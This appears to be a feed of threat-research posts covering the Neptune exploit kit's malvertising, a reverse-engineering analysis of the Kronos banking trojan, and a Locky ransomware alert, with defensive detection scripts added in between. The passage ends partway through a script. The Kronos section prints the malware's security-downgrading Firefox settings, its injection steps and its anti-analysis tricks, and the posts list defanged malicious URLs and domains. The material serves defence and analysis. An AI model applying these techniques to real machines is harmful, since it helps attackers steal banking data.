Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit

Exploit kit (EK) activity has been on the decline ever since Angler Exploit Kit was shut down in 2016. Fewer people using Internet Explorer and a drop in browser support for Adobe Flash – two primary targets of many exploit kits – have also contributed to this decline. Additionally, some popular redirect campaigns using PseudoDarkleech and EITest Gate to Rig Exploit Kit were shut down in the first half of this year.

Despite all this, malvertising campaigns involving exploit kits remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:

  • networkmarketingpro3[.]us
  • networkmarketingpro2[.]us
  • onlinesalesproaffiliate1[.]us
  • onlinesalesproaffiliate2[.]us
  • onlinesalesproaffiliate3[.]us
  • onlinesalesproaffiliate4[.]us
  • onlinesalesproaffiliate5[.]us
  • onlinesalesproaffiliate6[.]us

Payloads spread by Neptune Exploit Kit have since diversified.
Recently, we have seen changes in Neptune EK’s URI patterns, landing
pages, malvertisement campaigns and login account details associated
with the cryptocurrency mining payloads.


Since July 16, our Dynamic Threat Intelligence (DTI) has observed
changes in URI patterns for Neptune Exploit Kit. At the time of
writing, the new campaign abuses a legitimate popup ad service (within
Alexa’s top 100) with redirects to ads about hiking clubs, as shown in
Figure 1.

Figure 1: Fake ad for a hiking club leading to Neptune EK

Redirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other fake hiking ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site’s pop-up.

Figure 2: Silent redirect to EK landing page

FireEye Dynamic Threat Intelligence (DTI) stats show the regions
being affected by this campaign (Figure 3).

Figure 3: Regions affected by the malvertisement campaign, as observed from customer data

A few instances of the redirect involve flvto[.]download (mimicking
the legitimate www.flvto[.]biz) instead of hiking club fake ads.
Figure 4 and Figure 5 show the legitimate domain and fake domain,
respectively, for comparison’s sake.

Figure 4: Real page, flvto[.]biz (Alexa rank 2,674)

Figure 5: Fake page, flvto[.]download

Most of the ads linked to this campaign have been observed on
high-traffic torrent and multimedia hosting sites.
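The spoofing pattern described above (a legitimate site's label reused under a different TLD such as .club or .download) is something a defender can check for in web-proxy logs. The script below is an added example written for this post, not FireEye tooling: the log format, client addresses and benign entries are constructed, and the only "known good" domains it knows are the two the post names as the originals of the spoofed sites.

```python
"""Flag TLD-swap lookalike domains (highspirittreks[.]club vs
highspirittreks[.]com) in web-proxy logs.

Added example for this post, not FireEye's tooling. The proxy log format,
the client addresses and the benign entries are constructed; the
legitimate/spoofed domain pairs are the ones the post describes.
"""
import re
from collections import namedtuple
from typing import List, Optional, Tuple

# Legitimate domains that the post says the campaign's .club/.download
# sites imitate. In production this would be a brand/partner allowlist.
KNOWN_GOOD = {"highspirittreks.com", "flvto.biz"}

Hit = namedtuple("Hit", "ts host status lookalike_of")

# Constructed proxy log: timestamp, client, method, URL, HTTP status.
SAMPLE_LOG = """\
2017-07-17T10:01:02Z 10.0.0.5 GET http://highspirittreks[.]com/treks.html 200
2017-07-17T10:01:09Z 10.0.0.5 GET http://highspirittreks[.]club/ 302
2017-07-17T10:01:10Z 10.0.0.5 GET http://flvto[.]download/player 302
2017-07-17T10:02:15Z 10.0.0.7 GET http://www.flvto[.]biz/ 200
2017-07-17T10:03:44Z 10.0.0.9 GET http://example[.]org/news 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def refang(host: str) -> str:
    """Turn defanged notation (example[.]com) back into a real hostname."""
    return host.replace("[.]", ".").lower()


def registrable(host: str) -> Tuple[str, str]:
    """Split a hostname into (second-level label, TLD).

    Simplification: assumes a one-label public suffix (.com, .club, .biz);
    a real deployment would consult the Public Suffix List.
    """
    parts = host.rstrip(".").split(".")
    return parts[-2], parts[-1]


def lookalike_of(host: str) -> Optional[str]:
    """Return the known-good domain that `host` imitates by keeping the
    second-level label and swapping only the TLD, or None."""
    label, tld = registrable(host)
    for good in KNOWN_GOOD:
        good_label, good_tld = registrable(good)
        if label == good_label and tld != good_tld:
            return good
    return None


def host_of(url: str) -> str:
    """Extract the (refanged) hostname from a URL."""
    m = re.match(r"^[a-z]+://([^/]+)", url)
    return refang(m.group(1)) if m else ""


def scan(log_text: str) -> List[Hit]:
    """Return one Hit per request whose host is a TLD-swap lookalike."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, _client, _method, url, status = m.groups()
        host = host_of(url)
        target = lookalike_of(host)
        if target:
            hits.append(Hit(ts, host, status, target))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.ts} {h.host} (HTTP {h.status}) imitates {h.lookalike_of}")
```

Run as a script it reports the two spoofed hosts and their 302 responses while leaving the real highspirittreks[.]com and www.flvto[.]biz requests alone. The match is deliberately strict (identical label, different TLD); typo-squats with an edited label would need an edit-distance comparison on top of this.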

Sites are hosted on IP Reverse lookup for this
IP shows:

  • 2watchmygf[.]stream
  • flvto[.]download
  • highspirittreks[.]club
  • treknepal[.]club

Other hosted IPs and domains of the same campaign are in the
Indicators of Compromise section at the end of the post. All IPs point
to locations in Amsterdam.

Since July 16, related EK infrastructure has been hosted on domains
protected by Whois Guard. However, in recent activity, domains are
linked to the Registrant email: ‘gabendollar399@gmx[.]com’.

The following domains are currently associated with this email:

Domain Name              Create Date   Registrar
itsmebecauseyoua[.]pw    2017-03-05
loansforevery[.]us       2017-04-14    1 HOST RUSSIA, INC
managetheworld[.]us      2017-04-14    1 HOST RUSSIA, INC
nudecams[.]us            2017-04-14    1 HOST RUSSIA, INC

Exploits/Landing Page

The landing page for the Neptune Exploit Kit redirects to further
HTML and Adobe Flash exploit links after it checks the Flash versions
installed on the victim’s machine (see Figure 6).

Figure 6: Landing page of Neptune EK

This EK exploits multiple vulnerabilities in one run. Most of these
exploits are well-known and commonly seen in other exploit kits.

Currently, Neptune EK uses three Internet Explorer exploits and two
Flash exploits:

Payload (Monero miner)

The payload is dropped as a plain executable from one of the URIs belonging to the EK domain (the same domain as the landing page). Figure 7 shows a typical response header for these cases.

Figure 7: Response header for Monero miner payload

Post infection traffic shows an attempt to connect to
minergate[.]com (Figure 8) and a login attempt using the cpu-miner
service via the login email monsterkill20@mail[.]com (Figure 9). Login
attempts are invoked via the command line:

Figure 8: DNS query to minergate[.]com

Figure 9: Login attempt


Despite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering that drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.

FireEye NX detects exploit kit infection attempts before the malware payload is downloaded to the user’s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.

Indicators of Compromise

Malvertisement domains:
  • hxxp://treknepal[.]club/
  • hxxp://highspirittrecks[.]club
  • hxxp://advnepaltrekking[.]club
  • hxxp://nepalyogatrek[.]club
  • hxxp://flvto[.]download
Malvertisement IPs:
EK domains (current active) registrant:

Domain ID: D59392852-US
Sponsoring Registrar: NAMECHEAP, INC.
Sponsoring Registrar IANA ID: 1068
Registrar URL (registration services):
Domain Status:
Registrant ID: NLGUS4BVD3M2DN2Y
Registrant Name: kreb son
Registrant Address1: Maker 541
Registrant City: Navada
Registrant State/Province: SA
Registrant Postal Code: 546451
Registrant Country:
Registrant Country Code: BG
Registrant Phone Number: +44.45623417852
Registrant Email:
Registrant Application Purpose:
Registrant Nexus Category: C11
Administrative Contact ID: VNM50NNJ5Y0VNLDY
Administrative Contact Name: kreb son
Administrative Contact Address1: Maker 541
Administrative Contact City: Navada
Administrative Contact State/Province: SA
Administrative Contact Postal Code: 546451
Administrative Contact Country: Bulgaria
Administrative Contact Country Code: BG
Administrative Contact Phone Number: +44.45623417852
Administrative Contact Email: gabendollar399@gmx[.]com

Sample EK URI Pattern:


Sample MD5s:



We would like to thank Hassan Faizan for his contributions to this discovery.

Author: Zain Gardezi

Inside the Kronos malware – part 1

Recently, a researcher nicknamed MalwareTech, famous for stopping the WannaCry ransomware, was arrested for his alleged contribution to creating the Kronos banking malware. We still do not have a clear picture of whether the allegations are true or not – but let’s have a look at Kronos itself.


This malware was first advertised on the black market around July 2014, by an individual nicknamed VinnyK, writing in Russian:

Source: https://twitter.com/x0rz/status/893191612662153216

The full text of the advertisement, translated to English, has been included in the IBM’s Security Intelligence article.

We found Kronos being spread by various exploit kits, e.g. Sundown (more information here). The malware is still being distributed – some of the recent samples were captured about a month ago, dropped from Rig EK.

Nowadays, Kronos is often used for the purpose of downloading other malware. One of the campaigns using Kronos as a downloader was described by Proofpoint.

Analyzed samples

Samples from 2014:

Sample #1 (from 2016)

Sample #2 (from 2017):

Behavioral analysis

After being run, Kronos installs itself in a new folder (%APPDATA%/Microsoft/[machine-specific GUID]):

The dropped sample has a hidden attribute.

Persistence is achieved with the help of a simple Run key:

At the beginning of the execution, the malware modifies the Firefox profile, overwriting user.js with the following content:

user_pref("network.cookie.cookieBehavior", 0);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_submit_insecure", false);
user_pref("security.warn_submit_insecure.show_once", false);
user_pref("app.update.auto", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.allow-push", false);
user_pref("network.http.spdy.coalesce-hostnames", false);
user_pref("network.http.spdy.enabled.deps", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("network.http.spdy.enabled.http2draft", false);
user_pref("network.http.spdy.enforce-tls-profile", false);
user_pref("security.csp.enable", false);

The new settings are meant to give the malware more control over the browser’s behavior and to downgrade its security settings. Then, the malware injects itself into svchost and continues running from there. We can find it listening on local sockets.
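A small audit for the user.js profile above, added here as an example (it is not Malwarebytes' or the malware's code). It parses user_pref lines and flags the values that match the downgrade profile Kronos writes; the user.js it checks is a constructed sample, and which prefs are treated as suspicious is this example's own judgement.

```python
"""Audit a Firefox user.js for the security-downgrading prefs Kronos writes.

Added example for this write-up, not Malwarebytes' or Kronos' code. The
sample user.js below is constructed: two harmless prefs plus a subset of
the prefs from the listing above. Which prefs count as suspicious is
this example's own judgement.
"""
import re
from typing import Dict, List, Tuple

# Pref/value pairs from the Kronos user.js that weaken browser security or
# help the infection stay unnoticed.
SUSPICIOUS_VALUES = {
    "network.cookie.cookieBehavior": "0",        # accept all cookies
    "privacy.clearOnShutdown.cookies": "false",  # keep session cookies around
    "security.warn_viewing_mixed": "false",      # no mixed-content warnings
    "security.warn_submit_insecure": "false",    # no warning on plaintext form submit
    "app.update.auto": "false",                  # keep the browser unpatched
    "browser.safebrowsing.enabled": "false",     # no phishing/malware site blocking
    "security.csp.enable": "false",              # CSP off
}

# Any network.http.spdy.* pref forced to false is also a signal. The usual
# reading (an interpretation, not stated in the post) is that forcing plain
# HTTP/1.1 makes the traffic easier for the injected browser module to
# parse and tamper with.
SPDY_PREFIX = "network.http.spdy."

PREF_RE = re.compile(r'^\s*user_pref\(\s*"([^"]+)"\s*,\s*(.+?)\s*\);\s*$')


def parse_user_js(text: str) -> Dict[str, str]:
    """Return {pref_name: raw_value} for every user_pref(...) line."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = m.group(2)
    return prefs


def audit(prefs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (pref, value) pairs that match the Kronos downgrade profile."""
    findings = []
    for name, value in prefs.items():
        if SUSPICIOUS_VALUES.get(name) == value:
            findings.append((name, value))
        elif name.startswith(SPDY_PREFIX) and value == "false":
            findings.append((name, value))
    return findings


def audit_text(text: str) -> List[Tuple[str, str]]:
    """Convenience wrapper: parse and audit in one call."""
    return audit(parse_user_js(text))


# Constructed sample: two harmless prefs followed by prefs taken from the
# Kronos user.js shown in the post.
SAMPLE_USER_JS = """\
user_pref("browser.startup.page", 1);
user_pref("browser.tabs.warnOnClose", false);
user_pref("network.cookie.cookieBehavior", 0);
user_pref("browser.safebrowsing.enabled", false);
user_pref("security.csp.enable", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.http2", false);
"""


if __name__ == "__main__":
    for name, value in audit_text(SAMPLE_USER_JS):
        print(f"suspicious: {name} = {value}")
```

Pointed at the real file (%APPDATA%\Mozilla\Firefox\Profiles\<profile>\user.js on Windows) it lists five of the seven sample prefs and ignores the two harmless ones. A single flagged pref can be a legitimate user choice; the combination of Safe Browsing, CSP and automatic updates all being switched off in one profile is the pattern worth escalating.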

It is worth noting that Kronos deploys a simple userland rootkit that hides the infected process from monitoring tools, so the process running the main module may not be visible. The rootkit is, however, not implemented in a very reliable way, and the hiding does not always work.

Whenever a browser is launched, Kronos injects its module there and connects it with the main module that runs inside the svchost process. Looking at the TCP connections established by the particular processes (e.g. using Process Explorer), we can see that a browser is paired with the infected svchost:

This trick is often used by banking trojans for the purpose of stealing data from the browser. The module injected into the browser hooks the API the browser uses and steals the data. After that, it sends this data to the main module, which processes it further and reports to the CnC.

Network communication

The analyzed sample was connecting to CnCs at two addresses:


At the time of analysis, each CnC was dead (sinkholed), but still we could spot some patterns typical for this malware family.

First, the malware sends a beacon that is 74 bytes long:

Then, follows another chunk of data:

In both cases we can see that the requests are obfuscated by XOR with a random character. This is how the beacon looks after being XOR-decoded:

We can see that all the requests start with the same header, including the GUID specific to the infected machine.
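An analyst's helper for the single-byte XOR obfuscation described above, added as an example (not the page's or the malware's code). The beacon it decodes is constructed: a made-up header carrying a GUID-shaped machine id, encoded with a key chosen for the example; the real Kronos message layout is not reproduced. The GUID regex is used as the tell that the right key has been found, following the observation that every decoded request starts with a header containing the machine GUID.

```python
"""Recover a single-byte XOR key from a captured Kronos-style beacon.

Added example for this write-up, not the malware's or Malwarebytes' code.
The beacon is constructed (a made-up header carrying a GUID-shaped machine
id, encoded with a key chosen here); the real Kronos beacon layout is not
reproduced.
"""
import re
from typing import Tuple

# The post notes every decoded request starts with a header containing the
# machine GUID, so a GUID match is a strong sign that a key is correct.
GUID_RE = re.compile(
    rb"[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}"
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (XOR is its own inverse,
    so the same call encodes and decodes)."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> float:
    """Printable-ASCII ratio, plus a bonus when a GUID appears."""
    printable = sum(1 for b in candidate if 32 <= b < 127 or b in b"\r\n\t")
    s = printable / len(candidate)
    if GUID_RE.search(candidate):
        s += 1.0
    return s


def crack_single_byte_xor(data: bytes) -> Tuple[int, bytes]:
    """Try all 256 keys and return (key, plaintext) with the best score."""
    best_key = max(range(256), key=lambda k: score(xor_bytes(data, k)))
    return best_key, xor_bytes(data, best_key)


# Constructed "capture": a plaintext header encoded with the key 0x5A.
PLAINTEXT = b"id={12345678-ABCD-4EF0-9876-0123456789AB}&ver=1&cmd=ping"
BEACON = xor_bytes(PLAINTEXT, 0x5A)


if __name__ == "__main__":
    key, decoded = crack_single_byte_xor(BEACON)
    print(f"key=0x{key:02x} decoded={decoded!r}")
```

The printable-ratio score alone is often ambiguous for short messages, because several keys can map a short ciphertext onto printable bytes; the GUID bonus is what makes the choice unambiguous here. For a real capture, replace the GUID regex with whatever fixed header the family is known to use.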

Detailed research on decrypting Kronos communication has already been described here.


Interesting strings

Like most malware, Kronos is distributed packed by various packers/crypters. After unpacking the first layer, we get the malicious payload. We can easily identify Kronos by the typical strings used:

There are more strings that are typical for this particular malware:

Those strings are hashes used to dynamically load particular imported functions. Malware authors use this method to obfuscate the API functions they use and, by this, hide the real purpose of their tool. Instead of loading a function by its explicit name, they enumerate all the functions exported by a particular DLL, calculate hashes of their names, and if a hash matches the hardcoded one, they load that function.

Although the approach is common, the implementation seen in Kronos is not typical. Most malware stores hashes in the form of DWORDs, while Kronos stores them as strings.

Inside the early samples of Kronos, we can find a path to the debug symbols, revealing the structure of directories on the machine where the code was built. The following path was extracted from one of the Kronos samples observed in the wild (01901882c4c01625fd2eeecdd7e6745a):


The PDB path can be also found in the DLL (6c64c708ebe14c9675813bf38bc071cf) that belongs to the release of Kronos from 2014:


This module, injlib-client.dll, is the part injected into browsers. In the newer version of Kronos an analogous DLL can be found; however, the PDB path is removed.

Injection into svchost

The main module of Kronos injects itself into svchost (version from 2014 injects into explorer instead). In order to achieve this initial injection, the malware uses a known technique, involving the following steps:

  1. creates the svchost process as suspended
  2. maps its sections into its own address space
  3. modifies the sections, adding its own code and patching the entry point in order to redirect the execution there
  4. resumes the suspended process, letting the injected code execute

Below, you can see the memory inside the infected svchost (in early versions, the injection was targeting explorer). The malware is added in a new, virtual section – in the given example, mapped as 0x70000:

This is how the patched entry point of svchost looks – as we can see, execution is redirected to an address that lies inside the added section (the injected malware):

The execution of the injected PE file starts in a different function now – at RVA 0x11AB0:

– while the original Entry Point of the malware was at RVA 0x12F22:
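The injection steps above leave artefacts a defender can look for without any Kronos-specific signature: a private read-write-execute region that no file backs, and an entry point whose first jump leaves the image. The following added example (not Malwarebytes' code) checks a simplified memory map for both. The map records are constructed; the region base 0x70000 and the RVA 0x11AB0 are the values the post quotes, and the jump target is assumed to have been read off the patched entry point with a debugger.

```python
"""Flag process-hollowing artefacts in a process memory map.

Added example for this write-up, not Malwarebytes' code. The memory-map
records are constructed (a simplified form of what Process Hacker or VMMap
list); the addresses reuse the ones the post gives (injected region mapped
at 0x70000, new entry point at RVA 0x11AB0).
"""
from dataclasses import dataclass
from typing import List


@dataclass
class Region:
    base: int
    size: int
    protect: str       # "RX", "RW", "RWX", ...
    mapped_file: str   # backing image path, "" for private memory

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def private_rwx(regions: List[Region]) -> List[Region]:
    """Writable+executable regions with no backing file: what a PE mapped
    by hand (rather than by the Windows loader) looks like."""
    return [r for r in regions if r.protect == "RWX" and not r.mapped_file]


def entry_leaves_image(regions: List[Region], image_name: str,
                       first_jump_target: int) -> bool:
    """True when the patched entry point jumps to an address outside the
    main image, i.e. into injected code. `first_jump_target` is the
    destination of the first instruction at the entry point, as read
    with a debugger (assumed input)."""
    image = [r for r in regions
             if r.mapped_file.lower().endswith(image_name.lower())]
    return not any(r.contains(first_jump_target) for r in image)


def hollowing_indicators(regions: List[Region], image_name: str,
                         first_jump_target: int) -> List[str]:
    """Human-readable list of indicators found in the map."""
    findings = [f"private RWX region at {r.base:#x} ({r.size:#x} bytes)"
                for r in private_rwx(regions)]
    if entry_leaves_image(regions, image_name, first_jump_target):
        findings.append(
            f"entry point redirected to {first_jump_target:#x}, outside {image_name}")
    return findings


# Constructed map of a hollowed svchost.exe: the image and ntdll are
# loader-mapped; the malware lives in a private RWX region at 0x70000.
INFECTED_MAP = [
    Region(0x00070000, 0x20000, "RWX", ""),
    Region(0x01000000, 0x08000, "RX", r"C:\Windows\System32\svchost.exe"),
    Region(0x01008000, 0x02000, "RW", r"C:\Windows\System32\svchost.exe"),
    Region(0x77D00000, 0x130000, "RX", r"C:\Windows\System32\ntdll.dll"),
]
INJECTED_EP = 0x70000 + 0x11AB0   # injected region base + new entry RVA

# Constructed map of an uninfected svchost.exe for comparison.
CLEAN_MAP = [r for r in INFECTED_MAP if r.mapped_file]
CLEAN_EP = 0x01001000             # inside the image's own code section


if __name__ == "__main__":
    for finding in hollowing_indicators(INFECTED_MAP, "svchost.exe", INJECTED_EP):
        print("suspicious:", finding)
    print("clean map findings:", hollowing_indicators(CLEAN_MAP, "svchost.exe", CLEAN_EP))
```

The two checks are independent on purpose: JIT runtimes and some packers also create private RWX memory, so the region check alone is noisy, while the redirected entry point is a much rarer condition in a legitimate process. Both together are the classic hollowing picture the post shows.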

The malware defends itself from analysis: if a VM or a debugger is detected, the sample will crash soon after the injection.

Running sample from new Entry Point

The main operations of the malware start inside the injected module. This is how the new Entry Point looks:

The main function is responsible for loading all the imports, and then deploying the malicious actions.

If you are an analyst trying to run Kronos from that point of the execution, below you will find some tips.

The first block of the function is responsible for filling the import table of the injected module. If we want to run the sample from that point, rather than following it when it is injected, there are some important things to notice. First of all, the loader is supposed to fill some variables inside the injected executable, e.g. the variable module_base. Other functions refer to it, so if it does not contain a valid value, the sample will crash. Also, the functions filling the imports expect the section .rdata (containing the thunks to be filled) to be writable. It is writable when the sample is injected, because then the full PE is mapped in a memory region with RWX (read-write-execute) access rights. In the normal case, however – when the sample is run from disk – it is not. That’s why, in order to pass this stage, we need to change the access rights of the section manually.

Another option is to run the Kronos sample starting from the next block of the main function. This also leads to successful execution, because if the sample is run from disk rather than injected, the imports are filled by the Windows loader and doing it manually is redundant.

The last issue to bypass is the defensive checks, described below.

Defensive tricks

The malware deploys defense by making several environment checks. The checks are pretty standard – searching blacklisted processes, modules etc. The particular series of checks are called from inside one function, and results are stored as flags set in a dedicated variable:

If the debugger/VM is detected, the variable has a non-zero value. Further, the positive result of this check is used to make the malware crash, interrupting the analysis.

The crash is implemented by taking an execution path inappropriate for the architecture on which the sample was deployed. The malware is a 32-bit PE file, but it has slightly different execution paths depending on whether it is deployed on a 32-bit or a 64-bit system. First, the malware fingerprints the system and sets the flag indicating the architecture:

DWORD is_system64_bit()
{
	DWORD flag = 0;
	__asm {
		xor eax, eax
		mov ax, cs      // CS selector: 0x1B on native 32-bit Windows, 0x23 under WOW64
		shr eax, 5      // 0x1B >> 5 == 0, 0x23 >> 5 == 1
		mov flag, eax
	}
	return flag;
}

This trick relies on observations about typical values of the CS register on different versions of Windows (more information here). It is worth noting that it covers most, but not all, cases, and because of this the malware may not run properly on some versions of Windows.
If the debugger/VM is detected, the flag indicating the architecture is flipped:

That’s why the sample crashes at the next point where an architecture-specific execution path should be taken.

For example, if the sample is deployed on a 64-bit machine under WOW64, a syscall can be performed by calling the address pointed to by FS:[0xC]. But if the malware runs on a 32-bit machine, the value pointed to by FS:[0xC] will be NULL, so calling it crashes the sample.

This way of interrupting analysis is smart – the sample does not exit immediately after the VM/debugger is detected, which makes it harder to find out what the reason for the crash was.

Using raw syscalls

As mentioned in the previous paragraph, Kronos uses raw syscalls. A syscall is basically an interface that allows a function implemented by the kernel to be called from user mode. Applications usually use them via the API exported by system DLLs (a detailed explanation can be found, e.g., on EvilSocket’s blog).

Those API calls can be easily tapped by monitoring tools. That’s why some malware, for the sake of being stealthier, reads the syscall numbers from the appropriate DLLs and invokes them from its own code, without using the DLL as a proxy. This trick has been used, e.g., by Floki bot.

Let’s have a look at how it is implemented in Kronos. First, it fetches the appropriate syscall numbers from the system DLLs. As mentioned before, functions are identified by hashes of their names (the full hash-to-function mapping can be found in the Lexsi report).

For example:

B6F6X4A8R5D3A7C6 -> NtQuerySystemInformation

The syscall numbers are stored in variables, XORed with a constant. A fragment of the code responsible for extracting raw syscalls from the DLL:

In order to use them further, for every used syscall Kronos implements its own wrapper function with the appropriate number of parameters. You can see an example below:

The EAX register contains the number of the syscall. In the given example, it represents the following function:

00000105 -> NtQuerySystemInformation

Kronos uses raw syscalls to call the functions related to injection into other processes, because those usually trigger alerts. The functions called this way are listed below:


It matches the black market advertisement, stating: “The Trojan uses an undetected injection method” (source).

Rootkit and the hooking engine

One of the features this malware provides is a userland rootkit. Kronos hooks the API of the processes so that they are unable to notice its presence. The hooking is done by a specially crafted block of shellcode that is implanted in each accessible running process.

First, Kronos prepares the block of shellcode to be implanted. It fills in all the necessary data: the addresses of functions that are going to be used, and the data specific to the malware installation that is intended to be hidden.

Then, it searches through the running processes and tries to inject wherever it is possible. Interestingly, explorer.exe and chrome.exe are omitted:

The shellcode is deployed in a new thread within the infected process:

Below you can see the shellcode inside the memory of the infected process:

When it runs, it hooks the following functions in the address space of the infected process:


The interesting thing about this part of Kronos is its similarity to a hooking engine described by MalwareTech on his blog in January 2015. Later, he complained in a tweet that cybercriminals had stolen and adapted his code. Looking at the hooking engine of Kronos we can see a big overlap, which made us suspect that this part of Kronos could indeed be based on his ideas. However, it turned out that this technique was described much earlier (e.g. here – thanks to @xorsthings for the link), and both authors learned it from other sources rather than inventing it.

Let’s have a look at the technique itself. During hooking, one may run into concurrency issues. If a half-overwritten function starts to be used by another thread, the application will crash. To avoid this, it is best to install a hook with a single assembly instruction. MalwareTech described the idea of utilizing the instruction lock cmpxchg8b for this purpose. The same trick and a similar implementation can be found in Kronos.

The hooking function used by Kronos takes two parameters – the address of the function to be hooked, and the address of the function used as a proxy. This is the fragment of the implanted shellcode where the hooking function is called:

First, the hooking function searches for a suitable place in the code of the attacked function where the hook can be installed:

The above code is an equivalent of the following:


Then, it installs the hook:

As we can see, the method used to install the hook is almost identical to:


Below you can see an example of Kronos hooking the function ZwResumeThread in the memory of the attacked process. The instruction lock cmpxchg8b is indeed used to overwrite the function’s beginning:

After the hook installation, whenever the infected process calls the hooked function, the execution is redirected to the proxy code inside the malicious module:

The hooking engine used in Kronos is overall more sophisticated. First of all, the fact that it is shellcode rather than a PE file already makes it harder to implement: the author had to take care of filling in all the function addresses on his own. The author of Kronos has also shown more experience in anticipating real-life scenarios. For example, he took additional care to check whether the code had already been hooked (e.g. by other trojans or monitoring tools):

Attacking browsers

The malware injects an additional module (injlib-client.dll) into a browser. Below we can see an example of the DLL injected into Firefox’s address space:

The malware starts the injected module with the help of the injected shellcode:

We can see some API redirections added by the malware. Some of the functions imported by the attacked browser are hooked, so that all the data passing through them is tapped by the Kronos module.

The data grabbed through the hooked browser API is then sent to the main module, which coordinates the malware’s work and reports to the CnC server.


An overall look at the tricks used by Kronos shows that the author has prior knowledge of implementing malware. The code is well obfuscated and uses various tricks that require an understanding of some low-level workings of the operating system. The author not only used interesting tricks, but used them in a logical and fitting way. This level of precision led us to the hypothesis that Kronos is the work of a mature developer rather than an experimenting youngster.


https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en – “Overview of the Kronos banking malware rootkit” by Lexsi

https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en – Decrypting the configuration

The post Inside the Kronos malware – part 1 appeared first on Malwarebytes Labs.

Author: hasherezade

Security Alert: Locky Adds the .lukitus Extension, Spreads through Waves of Malspam

After infecting computers with recurring malicious email campaigns sent to random recipients in organizations from all over the world, Locky ransomware strikes again.

Locky’s persistence is already famous, as cyber criminals use it frequently to exploit vulnerabilities in outdated systems. The most recent campaign, which started late last night, uses a new extension called .lukitus and has been discovered by Rommel Joven. As expected, Internet users can get their files back, after paying a ransom required by attackers.

The malicious email arrives into users’ inboxes with the following subject lines:

< No Subject > or Emailing – CSI- [0-9] * _ MB_S_ [A-z0-9]

The email also includes zip or rar attachments with JS files. When these files are executed, they will download the payload from various malicious URLs, like the ones in the selection below (sanitized for your online safety):

http: // angel demon [.] com / jbYUF6D

http: // Antibody Services [.] net / jbYUF6D

http: // ttytreffdrorseder [.] net / of / jbYUF6D

http: // asliozturk [.] com / jbYUF6D

http: // antwerpiastamps [.] BE / jbYUF6D

This is another variation of the same attack, spotted yesterday as well:

Source: Bleeping Computer

To ensure that Locky can communicate with its underlying C&C servers unhindered, a DGA (Domain Generation Algorithm) is also used, which provides the following domains and many, many more (sanitized for your online safety):

http: // sorqjivpyfrwlo [.] Click / imageload.cgi

http: // dxeqiniexovy [.] org / imageload.cgi

http: // kokalgfsnepogq [.] ru / imageload.cgi

http: // kljidoejmiqx [.] org / imageload.cgi

http: // jcanepkjyu [.] biz / imageload.cgi
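The two URL sets above share one trait that is easier to detect than the hosts themselves: the same payload path (jbYUF6D) or C2 script (imageload.cgi) requested from many unrelated domains. The added example below (not Heimdal's or CSIS's tooling) groups proxy-log requests by the last path segment and flags names spread over several hosts, then applies a deliberately simple lexical DGA check as a weaker second signal. The log lines are constructed: the hosts are the sanitized URLs above with the spaces and "[.]" removed (an assumption about their original spelling) plus two benign entries.

```python
"""Correlate Locky download and C2 URLs in proxy logs by shared URI path.

Added example for this alert, not Heimdal's or CSIS's tooling. The log
lines are constructed: the hosts are the sanitized URLs from the alert
with spaces and "[.]" removed (an assumption about the original spelling)
plus two benign entries. The lexical DGA check is deliberately simple and
is shown as the weaker of the two signals.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed log: client, method, URL.
SAMPLE_LOG = """\
10.1.1.20 GET http://angeldemon.com/jbYUF6D
10.1.1.20 GET http://antibodyservices.net/jbYUF6D
10.1.1.21 GET http://ttytreffdrorseder.net/of/jbYUF6D
10.1.1.21 GET http://asliozturk.com/jbYUF6D
10.1.1.22 GET http://antwerpiastamps.be/jbYUF6D
10.1.1.22 GET http://sorqjivpyfrwlo.click/imageload.cgi
10.1.1.22 GET http://dxeqiniexovy.org/imageload.cgi
10.1.1.22 GET http://kokalgfsnepogq.ru/imageload.cgi
10.1.1.30 GET http://example.org/index.html
10.1.1.31 GET http://example.net/index.html
"""

LINE_RE = re.compile(r"^(\S+) (\S+) [a-z]+://([^/\s]+)(/\S*)?$")

Record = Tuple[str, str, str]  # client, host, path


def parse_log(text: str) -> List[Record]:
    """Parse the constructed log format into (client, host, path) tuples."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, _method, host, path = m.groups()
            records.append((client, host.lower(), path or "/"))
    return records


def group_by_basename(records: List[Record]) -> Dict[str, Set[str]]:
    """Map the last path segment to the set of hosts it was requested from."""
    groups: Dict[str, Set[str]] = defaultdict(set)
    for _client, host, path in records:
        basename = path.rsplit("/", 1)[-1]
        if basename:
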